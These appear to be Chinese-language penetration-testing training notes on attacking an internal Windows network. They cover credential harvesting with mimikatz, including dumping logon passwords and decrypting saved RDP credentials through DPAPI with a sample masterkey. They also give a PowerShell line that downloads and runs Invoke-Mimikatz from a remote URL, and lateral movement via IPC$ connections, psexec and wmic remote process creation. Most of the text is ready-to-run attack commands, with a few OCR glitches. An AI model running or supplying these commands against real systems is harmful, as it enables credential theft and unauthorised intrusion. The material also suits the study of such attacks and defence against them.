备忘脆弱性资产
内网流量嗅探

内网主机密码搜集

mimikatz抓取本机密码

mimikatz是一款简单且好用的windows密码抓取神器,该软件可帮助用户-键抓取window密
码，操作简单、使用方便。
在域渗透过程中另外一名老师会为大家讲解mimikatz的一-些高级使用，这里只做简单介绍

mimikatz "privilege:debug" "sekurlsa:logonpasswords" exit	读取本机密码

powershell "IEX (New-Object Net.WebClient).DownloadString('  ');Invoke-Mimikatz -DumpCreds" //powershell方式

powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz

mimikatz获取rdp连接记录密码

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
privilege::debug
dpapi:cred /in:C:\Users\A\AppData\Local\Microsoft\Credentials\CA881006071CB1238C13640450A5B676
寻找GuiMasterKey
sekurlsa::dpapi
dpapi:cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\8781378F7D47006A4FC98D2F8A266F58
/masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d

内网横向

IPC空连接概述

IPC(Internet Process Connection)是共享"命名管道"的资源。

它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令，连接建
立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

IPC是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个
连接。NT/2000在提供了ipc功能的同时，在初次安装系统时还打开了默认共享，即所有的逻
辑共享(.,…和系统自录winnt或windows(admin)共享。所有的这些，微软的初衷都是为
了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。

建立空连接命令

net share 查看本机共享
net use \\IP地址"密码" /user:用户名对其进行空连接
net use \\IP地址/del 删除空连接
net time \\IP地址查看机器时间

psexec 横向工具

微软提供的一种远程命令行工具
可直接用于对远程主机进行命令交互
psexec.exe -accepteula \\IP -u domain\administrator -p password command

wmic横向

wmic是一款Windows自带的工具集，
wmic /node: 192.168.200.10 /user:jack /password:a #连接后面拼接wmic命令
process call create“cmd.exe" #启动某一程序

process list brief #查看所有进程